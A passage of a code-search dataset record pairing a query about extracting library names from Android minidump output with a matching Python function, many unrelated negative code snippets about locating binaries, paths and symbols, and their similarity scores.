path_to_bin_files(path):\r\n files_list=list_of_files(path)\r\n for file in files_list:\r\n asm_lines = parse_data(file)\r\n symbols_dict = init_symbols_dictionary()\r\n collect_symbols_and_ignore_coments(asm_lines, symbols_dict)\r\n bin_lines = translate_to_binary(asm_lines, symbols_dict)\r\n create_output(bin_lines, file)", "def bin_search(binary):\n if sys.platform == 'win32':\n # Directory containing 'binary' should be in PATH\n return binary\n result = None\n mode = os.R_OK | os.X_OK\n for p in bin_search_path:\n path = join(p, binary)\n if os.access(path, mode) == 1:\n result = path\n break\n else:\n raise MissingBinary('Unable to find binary \"%s\"' % binary)\n return result", "def _GetDefaultBinIncludes(self):\n if sys.platform == \"win32\":\n pythonDll = \"python%s%s.dll\" % sys.version_info[:2]\n return [pythonDll, \"gdiplus.dll\", \"mfc71.dll\", \"msvcp71.dll\",\n \"msvcr71.dll\"]\n else:\n soName = distutils.sysconfig.get_config_var(\"INSTSONAME\")\n if soName is None:\n return []\n pythonSharedLib = self._RemoveVersionNumbers(soName)\n return [pythonSharedLib]", "def get_roots(self):\n roots = []\n for symbol in self.GlobalSymbolDict.values():\n if symbol.isRoot():\n roots += [symbol]\n return roots", "def _whicha(cmd, paths=None):\n import os\n if paths is None:\n paths = os.environ['PATH'].split(':')\n possibilities = [os.path.expanduser(os.path.join(p, cmd)) for p in paths]\n return filter(lambda bin: os.path.exists(bin), possibilities)", "def lookForQueueingCommands():\n for queue, binary in queueBinaryMap.items():\n if checkForBinary(binary):\n return queue\n else:\n raise Exception(\"Cannot locate a queueing system. None of these executables were found in your PATH: %s\" % (queueBinaryMap.values(),))", "def _jupyter_nbextension_paths():\n return [{\n \"section\": \"tree\",\n \"dest\": \"nbsysinfo\",\n \"src\": \"static\",\n \"require\": \"nbsysinfo/main\"\n }]", "def get_binaries(name_only=False):\n\n bins = list()\n\n dtf_db = sqlite3.connect(DTF_DB)\n cur = dtf_db.cursor()\n\n # This just returns the name\n if name_only:\n\n sql = ('SELECT name '\n 'FROM binaries ')\n\n for binary in cur.execute(sql):\n bins.append(binary[0])\n\n # This returns a list of items\n else:\n\n sql = ('SELECT name, version, '\n 'about, author '\n 'FROM binaries '\n 'ORDER BY name')\n\n cur.execute(sql)\n\n while True:\n\n item = dtf.core.item.Item()\n line = cur.fetchone()\n if line is None:\n break\n\n item.type = dtf.core.item.TYPE_BINARY\n item.name = line[0]\n item.version = line[1]\n item.about = line[2]\n item.author = line[3]\n\n bins.append(item)\n\n return bins", "def lib_dirs(self):\r\n ret = []\r\n for x in [y.type for y in self.variables] + [\r\n y.op for y in self.node_order]:\r\n try:\r\n ret += x.c_lib_dirs()\r\n except utils.MethodNotDefined:\r\n pass\r\n return utils.uniq(ret)", "def pdbfile_list():\n import glob, os\n os.chdir(\"../Data\")\n file_list = []\n for file in glob.glob(\"*.pdb\"):\n file_list.append(file)\n return file_list", "def get_platform_und_symbols():\n ret = None\n if osname_is_freebsd():\n ret = sorted([\"environ\", \"__progname\"])\n if is_verbose():\n print(\"Checking for required UND symbols... \" + str(ret))\n return ret", "def FindMissingBinaries(needed_tools):\n return [binary for binary in needed_tools if Which(binary) is None]", "def get_installation_paths(versions=None):\n\n pass", "def DumpSymbols(lib_path, dump_path):\n elf_parser = ExternalModules.elf_parser\n parser = None\n try:\n parser = elf_parser.ElfParser(lib_path)\n symbols = parser.ListGlobalDynamicSymbols()\n finally:\n if parser:\n parser.Close()\n if not symbols:\n return \"No symbols\"\n symbols.sort()\n with open(dump_path, \"w\") as dump_file:\n dump_file.write(\"\\n\".join(symbols) + \"\\n\")\n return \"Output: \" + dump_path", "def pdbfile_list():\n \n import glob, os\n os.chdir(\"../Data\")\n file_list = []\n for file in glob.glob(\"*.pdb\"):\n file_list.append(file)\n return file_list", "def bin_search(binary, default=_marker):\n mode = os.R_OK | os.X_OK\n envPath = os.environ['PATH']\n customPath = os.environ.get('BIBUTILS_PATH', '')\n searchPath = os.pathsep.join([customPath, envPath])\n bin_search_path = [path for path in searchPath.split(os.pathsep)\n if os.path.isdir(path)]\n\n if sys.platform == 'win32':\n extensions = ('.exe', '.com', '.bat', )\n else:\n extensions = ()\n\n for path in bin_search_path:\n for ext in ('', ) + extensions:\n pathbin = os.path.join(path, binary) + ext\n if os.access(pathbin, mode) == 1:\n return pathbin\n\n if default is _marker:\n raise MissingBinary('Unable to find binary \"%s\" in %s w' %\n (binary, os.pathsep.join(bin_search_path)))\n else:\n return default", "def syspaths(self):\n return self._syspaths", "def syspaths(self):\n return self._syspaths", "def syspaths(self):\n return self._syspaths", "def get_binaries(kdb,entry):\n xml = objectify.fromstring(entry.dump_xml())\n binaries = list(xml.xpath('./Binary'))\n for binary in binaries:\n yield (binary.Key.text, Binary(kdb,binary))", "def __add_paths(self, config):\n bin_path = os.path.join(\n self.directory.install_directory(self.feature_name), \"bin\"\n )\n whitelist_executables = self._get_whitelisted_executables(config)\n for f in os.listdir(bin_path):\n for pattern in BLACKLISTED_EXECUTABLES:\n if re.match(pattern, f):\n continue\n if whitelist_executables and f not in whitelist_executables:\n continue\n self.directory.symlink_to_bin(f, os.path.join(bin_path, f))", "def find_binary_in_path(filename: str) -> str:\n if \"PATH\" not in os.environ:\n raise PATHNotFoundError\n for directory in os.environ[\"PATH\"].split(os.pathsep):\n binary = os.path.abspath(os.path.join(directory, filename))\n if os.path.isfile(binary) and os.access(binary, os.X_OK):\n return binary\n raise BinaryNotFoundError", "def GetWorkloadFileList() -> list[str]:\n return [data.ResourcePath(workload) for workload in FLAGS.ycsb_workload_files]", "def get_scripts():\n scripts = []\n if os.path.isdir('bin'):\n scripts = [fname for fname in glob.glob(os.path.join('bin', '*'))\n if not os.path.basename(fname).endswith('.rst')]\n return scripts", "def FindBinary(module_space, bin_name):\n if not bin_name:\n return None\n if bin_name.startswith(\"//\"):\n # Case 1: Path is a label. Not supported yet.\n raise AssertionError(\n \"Bazel does not support execution of Python interpreters via labels yet\"\n )\n elif os.path.isabs(bin_name):\n # Case 2: Absolute path.\n return bin_name\n # Use normpath() to convert slashes to os.sep on Windows.\n elif os.sep in os.path.normpath(bin_name):\n # Case 3: Path is relative to the repo root.\n return os.path.join(module_space, bin_name)\n else:\n # Case 4: Path has to be looked up in the search path.\n return SearchPath(bin_name)", "def extract_gcc_binaries():\n patterns = [\n \"/opt/local/bin/g++-mp-[0-9]*.[0-9]*\",\n \"/opt/local/bin/g++-mp-[0-9]*\",\n \"/usr/local/bin/g++-[0-9]*.[0-9]*\",\n \"/usr/local/bin/g++-[0-9]*\",\n ]\n if platform.system() == \"Darwin\":\n gcc_binaries = []\n for pattern in patterns:\n gcc_binaries += glob.glob(pattern)\n gcc_binaries.sort()\n if gcc_binaries:\n _, gcc = os.path.split(gcc_binaries[-1])\n return gcc\n else:\n return None\n else:\n return None", "def get_scripts():\n scripts = []\n if os.path.isdir('bin'):\n scripts = [ fname for fname in glob.glob(os.path.join('bin', '*'))\n if not os.path.basename(fname).endswith('.rst') ]\n return scripts", "def find_symbols(self, **kw):\n return list(self.ifind_symbols(**kw))", "def get_basic_search_subdirs(afile):\n if os.path.exists(afile):\n elf_class = get_elf_class(afile)\n if \"ELF32\" == elf_class:\n # Do not search lib64 dir for 32bit binary file\n return ['', 'bin', 'sbin', 'lib', 'usr/bin', 'usr/sbin', 'usr/lib']\n return ['', 'bin', 'sbin', 'lib64', 'usr/bin', 'usr/sbin', 'usr/lib64', 'lib', 'usr/lib']", "def get_symbols(self, type_name):\n return self._symtab[type_name].get_symbols()", "def available_binary_choices() -> Iterable[str]:\n for name, _ in inspect.getmembers(sys.modules[__name__], inspect.isclass):\n if name.startswith('Binary'):\n yield name", "def _GetDefaultBinExcludes(self):\n if sys.platform == \"win32\":\n return [\"comctl32.dll\", \"oci.dll\", \"cx_Logging.pyd\"]\n else:\n return [\"libclntsh.so\", \"libwtc9.so\"]", "def get_data_files():\n return [\n ('share/jupyter/nbextensions/{}'.format(PY_PACKAGE), TARGETS),\n ('share/jupyter/lab/extensions', [\n os.path.relpath(f, '.') for f in glob.glob(TAR_PATH)\n ])\n ]", "def selected_lib_roots(args: Namespace) -> List[str]:\n return [LIB_ROOTS[lib] for lib in selected_libs(args)]", "def get_paths_from(self, symbol):\n to_return = []\n visitation_queue = [self.head]\n while len(visitation_queue) != 0:\n visiting = visitation_queue.pop(0)\n for elem in visiting.children:\n visitation_queue.append(elem)\n if symbol in visiting.inputs:\n v = visiting\n model_trail = []\n while v.parent is not None:\n model_trail.append(v.m)\n v = v.parent\n to_return.append(SymbolPath(visiting.inputs, model_trail))\n return to_return", "def loaded_modules() -> List[str]:\n return PYSTAC_IO.keys()", "def get_symbols_list(self):\n return self.symbols_list", "def discover_new_binaries(self):\n # get new binaries from the discovery cpfs, if any\n if not self._plugins_used:\n return []\n\n plugins_bins = [pl.discover_new_binaries() for pl in self._plugins_used]\n return [item for bins in plugins_bins for item in bins]", "def find_symbols(lst):\n ret = []\n for ii in lst:\n ret += [find_symbol(ii)]\n return ret", "def find(cls, paths):\r\n pythons = []\r\n for path in paths:\r\n for fn in cls.expand_path(path):\r\n basefile = os.path.basename(fn)\r\n if any(matcher.match(basefile) is not None for matcher in cls.REGEXEN):\r\n try:\r\n pythons.append(cls.from_binary(fn))\r\n except Exception as e:\r\n TRACER.log('Could not identify %s: %s' % (fn, e))\r\n continue\r\n return pythons", "def get_reference_binary():\n return \"./Binary/linux-x64/astcenc\"", "def get_existing_symbols():\n instruments = pyRofex.get_all_instruments()[\"instruments\"]\n existing_symbols = []\n for instrument in instruments:\n existing_symbols.append(instrument[\"instrumentId\"][\"symbol\"])\n return existing_symbols", "def get_all_symbols(kem_dirs):\n symbols = set()\n\n for kd in kem_dirs:\n for obj_path in filter_object_files(find_object_files(kd)):\n for symbol in filter_symbols(get_symbols(obj_path)):\n symbols.add(symbol)\n\n if symbols:\n return symbols\n\n raise oqs.KemException('No symbols found')", "def binary_location(cmd, USE_PATH=False):\n return os.path.join(BIN_PREFIX, cmd)", "def _extract_system_path(self, script):\r\n\r\n DEFAULT_PATH = ['code']\r\n\r\n # Separate paths by :, like the system path.\r\n raw_path = script.get('system_path', '').split(\":\") + DEFAULT_PATH\r\n\r\n # find additional comma-separated modules search path\r\n path = []\r\n\r\n for dir in raw_path:\r\n if not dir:\r\n continue\r\n\r\n # path is an absolute path or a path relative to the data dir\r\n dir = os.path.join(self.capa_system.filestore.root_path, dir)\r\n # Check that we are within the filestore tree.\r\n reldir = os.path.relpath(dir, self.capa_system.filestore.root_path)\r\n if \"..\" in reldir:\r\n log.warning(\"Ignoring Python directory outside of course: %r\", dir)\r\n continue\r\n\r\n abs_dir = os.path.normpath(dir)\r\n path.append(abs_dir)\r\n\r\n return path", "def SearchPath(name, path=None):\n path = path or os.environ['PATH']\n for dir in path.split(os.pathsep):\n binpath = os.path.join(dir, name)\n if os.path.exists(binpath):\n return os.path.abspath(binpath)\n return None", "def GetFilesForTool(self):\n return ['tools/valgrind/android/vg-chrome-wrapper-tsan.sh',\n 'tools/valgrind/tsan/suppressions.txt',\n 'tools/valgrind/tsan/suppressions_android.txt',\n 'tools/valgrind/tsan/ignores.txt']", "def get_entry_points():\n ret = []\n\n # global roots\n ret.extend(get_globals())\n # dynamic global roots\n ret.extend(get_dyn_globals())\n # stacks and local roots\n ret.extend(walk_ocaml_stacks())\n\n # global C roots\n ret.extend(get_global_roots(\"caml_global_roots\"))\n ret.extend(get_global_roots(\"caml_global_roots_young\"))\n ret.extend(get_global_roots(\"caml_global_roots_old\"))\n\n # finalised values\n ret.extend(get_final_roots())\n\n # scan_roots_hook\n traverse_scan_roots_hook()\n return ret", "def get_exec_path(self):\n bin_name = 'test_hint_time'\n # Look for in place build\n script_dir = os.path.dirname(os.path.realpath(__file__))\n bin_path = os.path.join(script_dir, '.libs', bin_name)\n if not os.path.exists(bin_path):\n # Look for out of place build from using apps/build_func.sh\n int_dir = os.path.dirname(script_dir)\n bin_path_op = os.path.join(int_dir, 'build/integration/test/.libs', bin_name)\n if not os.path.exists(bin_path_op):\n msg = 'Could not find application binary, tried \\n \"{}\"\\n \"{}\"'.format(\n bin_path, bin_path_op)\n raise RuntimeError(msg)\n bin_path = bin_path_op\n return bin_path", "def get_candidate_paths():\n yield get_linked_libpython()\n\n # List candidates for directories in which libpython may exist\n config_vars = \"LIBPL\", \"srcdir\", \"LIBDIR\"\n lib_dirs = list(map(sysconfig.get_config_var, config_vars))\n\n if is_windows():\n lib_dirs.append(os.path.join(os.path.dirname(sys.executable)))\n else:\n lib_dirs.append(os.path.join(\n os.path.dirname(os.path.dirname(sys.executable)),\n \"lib\"))\n\n # For macOS:\n lib_dirs.append(sysconfig.get_config_var(\"PYTHONFRAMEWORKPREFIX\"))\n\n lib_dirs.append(sys.exec_prefix)\n lib_dirs.append(os.path.join(sys.exec_prefix, \"lib\"))\n\n lib_basenames = list(get_candidate_names())\n\n for directory in filter(bool, lib_dirs):\n for basename in lib_basenames:\n yield os.path.join(directory, basename)\n\n # In macOS and Windows, ctypes.util.find_library returns a full path:\n for basename in lib_basenames:\n yield ctypes.util.find_library(get_library_name(basename))", "def list_syms():\n\tSymStringVec=[];\n\tSymStringVec.append(\"CSYM\");\n\tSymStringVec.append(\"DSYM\");\n\tSymStringVec.append(\"TET_SYM\");\n\tSymStringVec.append(\"OCT_SYM\");\n\tSymStringVec.append(\"ICOS_SYM\");\n\tSymStringVec.append(\"ISYM\");\n\treturn SymStringVec", "def gyp_files(self):\n return set(self._gyp_flags.keys())", "def scan_path(executable=\"mongod\"):\n for path in os.environ.get(\"PATH\", \"\").split(\":\"):\n path = os.path.abspath(path)\n executable_path = os.path.join(path, executable)\n if os.path.exists(executable_path):\n return executable_path", "def binary_bases(cls):\n return cls._BINARY_BASES", "def get_package_list():\n pip_freeze = subprocess.check_output(('pip', 'freeze')).decode('utf8')\n package_list = [x.strip().split('==') for x in pip_freeze.split('\\n') if x.find('==') != -1]\n package_list = [(x[0].lower(), x[1]) for x in package_list]\n return package_list", "def GetFilesForTool(self):\n return ['tools/valgrind/android/vg-chrome-wrapper.sh',\n 'tools/valgrind/memcheck/suppressions.txt',\n 'tools/valgrind/memcheck/suppressions_android.txt']", "def parse_paths():\r\n sources = get_source_paths()\r\n results = collections.defaultdict(list)\r\n for root_dir in sources:\r\n\r\n for script_type, dirs in walkdirs(root_dir).iteritems():\r\n\r\n for d in dirs:\r\n logger.debug(d)\r\n\r\n # Add paths to environments\r\n if os.path.basename(d).lower().startswith(ICONS):\r\n results['XBMLANGPATH'].append(d)\r\n os.environ['XBMLANGPATH'] += os.pathsep + d\r\n\r\n if script_type == 'mel':\r\n results['MAYA_SCRIPT_PATH'].append(d)\r\n os.environ['MAYA_SCRIPT_PATH'] += os.pathsep + d\r\n else:\r\n results['PYTHONPATH'].append(d)\r\n site.addsitedir(d)\r\n return results", "def get_password_binaries_array(password):\r\n password_binary_array = []\r\n\r\n # Create array of binaries from the password\r\n for character in password:\r\n password_binary_array.append(get_binary(character))\r\n\r\n # Join it together for parsing\r\n binary = \"\".join(password_binary_array)\r\n\r\n # Start the array off with the actual padded password binary\r\n rebuild_binaries = [binary]\r\n\r\n # This loops through the binary string, reducing it by\r\n # one (in length) with each pass appending string to array\r\n # Stops once the binary length is 1 (one)\r\n while len(binary) > 1:\r\n # Use the function logic to reduce the binary by one based on simple logic\r\n binary = binary_reduction(binary)\r\n # Add that new binary to this array for later usage\r\n rebuild_binaries.append(binary)\r\n\r\n return rebuild_binaries", "def print_symbols():\n\n global program\n if program is None:\n print \"no program is loaded\"\n return\n for(s, a) in program.symbols():\n print \"0x{:x} : {}\".format(a, s)", "def symbols(self) -> List[SingleMapping]:\n return self._symbols", "def list_symbol_tables(mst):\n stlist = []\n def append_st(st):\n #print(st)\n stlist.append(st)\n for s in st.get_symbols():\n for ns in s.get_namespaces():\n append_st(ns)\n if not isinstance(mst, symtable.SymbolTable):\n # Assume it is text of a program to compile\n mst = symtable.symtable(mst, '<string>', 'exec')\n append_st(mst)\n return stlist", "def syspath():\n import sys\n pprint(sys.path)", "def _get_paths():\n paths = [\n '/'\n ]\n return paths", "def storer_paths():\n return [dir_unchecked(), dir_checked(),\n dir_backup(), dir_tests()]", "def getSourcePaths(self, makeGlyphs=True, makeKerning=True, makeInfo=True):\n paths = []\n for name in self.sources.keys():\n paths.append(self.sources[name][0].path)\n return paths", "def _jupyter_nbextension_paths():\n return [{\n \"section\": \"notebook\",\n \"dest\": \"nbresuse\",\n \"src\": \"static\",\n \"require\": \"nbresuse/main\"\n }]", "def find_executable(*names: str,\n additional_roots: Iterable[Path] = (),\n additional_files: Iterable[Path] = ())-> Optional[Path]:\n for path in additional_files:\n if path_is_executable(path):\n return path\n\n for root in chain(additional_roots, os.get_exec_path()):\n root = Path(root)\n for name in names:\n path = root / name\n if path_is_executable(path):\n return path\n return None", "def get_breakpoint_files(self):\r\n return self.bpoints.values(key='filename')", "def get_all_setups_roots():\n ta_roots = cmds.ls(\"*.{}\".format(CONFIG[\"config_attr\"]), r=True, o=True)\n return ta_roots", "def gather_binaries():\n # Query git for all Rust versions released and store freshly built binaries\n # for those in BINDIR\n tags = [tag.decode() for tag in subprocess.check_output([\"git\", \"tag\"]).split()]\n tags.remove(\"PRERELEASE\")\n\n # Ignore Ruby tags\n rust_tags = list(filter(lambda tag: not tag.startswith(\"0\"), tags))\n rust_tags = list(filter(lambda tag: not tag.startswith(\"1\"), rust_tags))\n\n # Just do the three last releases\n rust_tags = list(sorted(rust_tags, key=natural_keys))[-3:]\n\n # Make sure we binaries for older versions\n with tempfile.TemporaryDirectory(prefix=\"riff-benchmark\") as clonedir:\n subprocess.run([\"git\", \"clone\", \"-b\", \"master\", \".\", clonedir], check=True)\n\n build_latest_commit(clonedir)\n\n for tag in rust_tags:\n binary_name = os.path.join(BINDIR, f\"riff-{tag}\")\n if os.path.isfile(binary_name):\n continue\n\n print()\n print(f\"Building missing binary: {binary_name}\")\n build_binary(clonedir, tag, binary_name)\n\n # Build the current version\n print()\n print(\"Building current sources...\")\n cargo_build()\n shutil.copy(\"target/release/riff\", os.path.join(BINDIR, \"riff-current\"))", "def calculate_compile_roots(targets, is_thrift_target):\r\n\r\n basedirs, sources = calculate_compile_sources(targets, is_thrift_target)\r\n sources = find_root_thrifts(basedirs, sources)\r\n return basedirs, sources", "def find_brew_binary_location(package_folder, search_string):\n match_str = '/usr/local/Cellar/%s/**/*%s*' % (package_folder,\n search_string)\n paths = glob.glob(match_str, recursive=True)\n for path in paths:\n if os.access(path, os.X_OK):\n return path\n return None", "def get_bin_dir():\n return os.path.abspath(os.path.join(get_root_dir(), 'bin/'))", "def extract_symbols(lib_file, static_lib=None):\n if static_lib is None:\n static_lib = is_static_library(lib_file)\n if sys.platform.startswith('aix'):\n extractor = AIXDumpExtractor(static_lib=static_lib)\n elif ReadElfExtractor.find_tool() and not static_lib:\n extractor = ReadElfExtractor(static_lib=static_lib)\n else:\n extractor = NMExtractor(static_lib=static_lib)\n return extractor.extract(lib_file)" ]
[ "0.7554683", "0.65706384", "0.6247244", "0.6195482", "0.61567324", "0.61457145", "0.6059669", "0.60321474", "0.60022146", "0.60022146", "0.59460664", "0.5926765", "0.5923688", "0.5919705", "0.58894503", "0.5882842", "0.5870094", "0.5855827", "0.58501244", "0.5832909", "0.58105147", "0.5784442", "0.5758196", "0.5745872", "0.57256746", "0.5721621", "0.5702363", "0.5696622", "0.56915563", "0.56731075", "0.5651484", "0.5638282", "0.56334263", "0.5627127", "0.5625484", "0.56164443", "0.5614456", "0.5605643", "0.5583373", "0.5582826", "0.5565979", "0.5560789", "0.5551487", "0.5551487", "0.5551487", "0.5550011", "0.5528494", "0.55274045", "0.55150753", "0.55102146", "0.551005", "0.5499464", "0.5496176", "0.5486274", "0.54716265", "0.5463271", "0.54554874", "0.54514843", "0.5450105", "0.5439295", "0.5438265", "0.54335934", "0.5432427", "0.5428893", "0.5428698", "0.5427372", "0.5422991", "0.5409529", "0.54088724", "0.53723556", "0.5349384", "0.5343712", "0.5329794", "0.5329489", "0.53281254", "0.53174436", "0.53145176", "0.5295403", "0.5287635", "0.52807266", "0.5275958", "0.52744776", "0.52725327", "0.5272099", "0.52544403", "0.5253917", "0.524593", "0.52415955", "0.52264434", "0.5221577", "0.52205795", "0.52190065", "0.5212709", "0.52122843", "0.52048004", "0.51993966", "0.51973754", "0.51918995", "0.5185401", "0.5182889" ]
0.7863217
0
Extracts library names that may contain symbols from the minidump. This is a duplicate of the logic in Chromium's //build/android/stacktrace/crashpad_stackwalker.py.
def _ExtractLibraryNamesFromDump(self, minidump): default_library_name = 'libmonochrome.so' minidump_dump_output = self._GetMinidumpDumpOutput(minidump) if not minidump_dump_output: logging.warning( 'Could not get minidump_dump output, defaulting to library %s', default_library_name) return [default_library_name] library_names = [] module_library_line_re = re.compile(r'[(]code_file[)]\s+= ' r'"(?P<library_name>lib[^. ]+.so)"') in_module = False for line in minidump_dump_output.splitlines(): line = line.lstrip().rstrip('\n') if line == 'MDRawModule': in_module = True continue if line == '': in_module = False continue if in_module: m = module_library_line_re.match(line) if m: library_names.append(m.group('library_name')) if not library_names: logging.warning( 'Could not find any library name in the dump, ' 'default to: %s', default_library_name) return [default_library_name] return library_names
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def GetSymbolBinaries(self, minidump):\n libraries = self._ExtractLibraryNamesFromDump(minidump)\n symbol_binary_dir = self._GetSymbolBinaryDirectory(minidump, libraries)\n if not symbol_binary_dir:\n return []\n\n return [os.path.join(symbol_binary_dir, lib) for lib in libraries]", "def get_platform_und_symbols():\n ret = None\n if osname_is_freebsd():\n ret = sorted([\"environ\", \"__progname\"])\n if is_verbose():\n print(\"Checking for required UND symbols... \" + str(ret))\n return ret", "def extract_symbols(lib_file, static_lib=None):\n if static_lib is None:\n static_lib = is_static_library(lib_file)\n if sys.platform.startswith('aix'):\n extractor = AIXDumpExtractor(static_lib=static_lib)\n elif ReadElfExtractor.find_tool() and not static_lib:\n extractor = ReadElfExtractor(static_lib=static_lib)\n else:\n extractor = NMExtractor(static_lib=static_lib)\n return extractor.extract(lib_file)", "def _GetSymbolBinaryDirectory(self, minidump, libraries):\n if minidump in self._minidump_symbol_binaries_directories:\n return self._minidump_symbol_binaries_directories[minidump]\n\n # Get the processor architecture reported by the minidump.\n arch = None\n matcher = re.compile(_PROCESSOR_ARCH_REGEX)\n for line in self._GetMinidumpDumpOutput(minidump).splitlines():\n match = matcher.match(line)\n if match:\n arch = match.groupdict()['arch'].lower()\n break\n if not arch:\n logging.error('Unable to find processor architecture for minidump %s',\n minidump)\n self._minidump_symbol_binaries_directories[minidump] = None\n return None\n if arch not in _BREAKPAD_ARCH_TO_FILE_REGEX:\n logging.error(\n 'Unsupported processor architecture %s for minidump %s. This is '\n 'likely fixable by adding the correct mapping for the architecture '\n 'in android_minidump_symbolizer._BREAKPAD_ARCH_TO_FILE_REGEX.',\n arch, minidump)\n self._minidump_symbol_binaries_directories[minidump] = None\n return None\n\n # Look for a directory that contains binaries with the correct architecture.\n matcher = re.compile(_BREAKPAD_ARCH_TO_FILE_REGEX[arch])\n symbol_dir = None\n for symbol_subdir in _POSSIBLE_SYMBOL_BINARY_DIRECTORIES:\n possible_symbol_dir = os.path.join(self._build_dir, symbol_subdir)\n if not os.path.exists(possible_symbol_dir):\n continue\n for f in os.listdir(possible_symbol_dir):\n if f not in libraries:\n continue\n binary_path = os.path.join(possible_symbol_dir, f)\n stdout = subprocess.check_output(\n ['file', binary_path], stderr=subprocess.STDOUT)\n if matcher.match(stdout):\n symbol_dir = possible_symbol_dir\n break\n\n if not symbol_dir:\n logging.error(\n 'Unable to find suitable symbol binary directory for architecture %s.'\n 'This is likely fixable by adding the correct directory to '\n 'android_minidump_symbolizer._POSSIBLE_SYMBOL_BINARY_DIRECTORIES.',\n arch)\n self._minidump_symbol_binaries_directories[minidump] = symbol_dir\n return symbol_dir", "def extract_functions(elf_path):\n text_data = objdump_section(elf_path, '.text')\n name_to_addr = parse_func_names(text_data)\n return name_to_addr", "def __init__(self, dump_finder, build_dir, symbols_dir=None):\n # Map from minidump path (string) to minidump_dump output (string).\n self._minidump_dump_output = {}\n # Map from minidump path (string) to the directory that should be used when\n # looking for symbol binaries (string).\n self._minidump_symbol_binaries_directories = {}\n # We use the OS/arch of the host, not the device.\n super(AndroidMinidumpSymbolizer, self).__init__(\n platform.system().lower(), platform.machine(), dump_finder, build_dir,\n symbols_dir=symbols_dir)", "def _ExtractLibraryLoadAddressesFromLogcat(logs):\n browser_libs = LibraryLoadMap()\n renderer_libs = LibraryLoadMap()\n for m in re_library_address.finditer(logs):\n process_type, lib_name, lib_address = m.groups()\n lib_address = int(lib_address, 16)\n if process_type == 'BROWSER':\n browser_libs[lib_name] = lib_address\n elif process_type == 'RENDERER':\n renderer_libs[lib_name] = lib_address\n else:\n assert False, 'Invalid process type'\n\n return browser_libs, renderer_libs", "def get_libraries_names():\n rpm_packages_path = path.join(PMDK_PATH, 'rpm', SYSTEM_ARCHITECTURE)\n libraries_names = [elem.split('-')[0] for elem in listdir(rpm_packages_path)\n if PMDK_VERSION in elem]\n return set(libraries_names)", "def _LoadGlobalSymbolsFromDump(dump_obj):\n symbols = set()\n for key in (\"elf_functions\", \"elf_objects\"):\n symbols.update(\n symbol.get(\"name\", \"\") for symbol in dump_obj.get(key, []) if\n symbol.get(\"binding\", \"global\") == \"global\")\n return symbols", "def get_memory_tool_labels(stacktrace):\n # Remove stack frames and paths to source code files. This helps to avoid\n # confusion when function names or source paths contain a memory tool token.\n data = ''\n for line in stacktrace.split('\\n'):\n if STACKFRAME_LINE_REGEX.match(line):\n continue\n data += line + '\\n'\n\n labels = [t['label'] for t in MEMORY_TOOLS_LABELS if t['token'] in data]\n return labels", "def test_GetSymbolMapping_normalize(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/.//myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def _GetSymbolNameToFilename(build_directory):\n symbol_extractor.CheckLlvmNmExists()\n path = os.path.join(build_directory, 'obj')\n object_filenames = cyglog_to_orderfile.GetObjectFilenames(path)\n pool = multiprocessing.Pool()\n symbol_names_filename = zip(\n pool.map(symbol_extractor.SymbolNamesFromLlvmBitcodeFile,\n object_filenames),\n object_filenames)\n pool.close()\n result = {}\n for (symbol_names, filename) in symbol_names_filename:\n stripped_filename = filename[len(build_directory):]\n if stripped_filename.startswith('/obj/'):\n stripped_filename = stripped_filename[len('/obj/'):]\n for s in symbol_names:\n result[s] = stripped_filename\n return result", "def get_symbols(doc, lib):\n\n basename = lib.replace(\".dll\", \"\").lower()\n filename = os.path.join(get_hopper_script_dir(), basename + \".txt\")\n if not os.path.exists(filename):\n doc.log(\"Symbol file not found: %s\" % filename)\n return None\n\n symbols = {}\n with open(filename, \"r\") as fp:\n for i, line in enumerate(fp, 1):\n match = symbol_line.match(line)\n if not match:\n doc.log(\"Skipping line %d: Malformed\" % i)\n continue\n\n ordinal, name = match.group(1), match.group(2)\n if ordinal and name:\n symbols[ordinal] = name\n\n return symbols", "def extract(self, lib):\n cmd = [self.nm_exe] + self.flags + [lib]\n out = subprocess.check_output(cmd).decode()\n fmt_syms = (self._extract_sym(l)\n for l in out.splitlines() if l.strip())\n # Cast symbol to string.\n final_syms = (repr(s) for s in fmt_syms if self._want_sym(s))\n # Make unique and sort strings.\n tmp_list = list(sorted(set(final_syms)))\n # Cast string back to symbol.\n return util.read_syms_from_list(tmp_list)", "def _DiffElfSymbols(self, dump_obj, parser):\n dump_symbols = self._LoadGlobalSymbolsFromDump(dump_obj)\n lib_symbols = parser.ListGlobalDynamicSymbols(include_weak=True)\n return sorted(dump_symbols.difference(lib_symbols))", "def decode_traceback(traceback_str, in_binfile=\"\", search_dirs=[]):\n print (\"Decoding: \" + traceback_str + \"\\n\")\n tb_str = \"Traceback=\"\n start = traceback_str.find(tb_str)\n if start < 0:\n print (\"Error: Unexpected Traceback string: it must contain '\" + tb_str + \"'\")\n return \"Error: Failed to decode\"\n tokens = traceback_str[(start + len(tb_str)):].split()\n if len(tokens) < 1:\n print (\"Error: Unexpected Traceback string: too short\")\n return \"Error: Failed to decode\"\n # the first token must be the binary that generates the traceback\n binfile = find_binfile(in_binfile, tokens[0], search_dirs)\n verbose(\"The main binary file is: \" + str(binfile), LEVEL_0)\n shlib_db = dict()\n if args.useldd and binfile and os.path.exists(binfile):\n # only if -u command option is specified\n shlib_db = get_all_shlib_paths_via_ldd(binfile)\n verbose(\"The shared library database from ldd is: \" + str(shlib_db), LEVEL_2)\n decode_result = \"\"\n for token in tokens:\n if '+' in token:\n result = get_addr2line(token, binfile, search_dirs, shlib_db)\n verbose(result, LEVEL_0)\n decode_result += result + \"\\n\"\n return decode_result", "def testStacktraceParsing(self, mock_get_dependency):\n mock_get_dependency.return_value = {\n 'chrome': Dependency('chrome', 'https://repo', 'rev1')\n }\n\n uma_data = self._GetDummyUMAData()\n actual_stack_trace = uma_data.stacktrace\n\n stack_frame0 = stacktrace.ProfilerStackFrame(\n 0, 0.1, float('inf'), False, 'chrome', 'wWinMain',\n 'app/chrome_exe_main_win.cc', 'chrome/app/chrome_exe_main_win.cc',\n 'https://repo', 484,\n (stacktrace.FunctionLine(line=490, sample_fraction=0.7),\n stacktrace.FunctionLine(line=511, sample_fraction=0.3)),\n (stacktrace.FunctionLine(line=490, 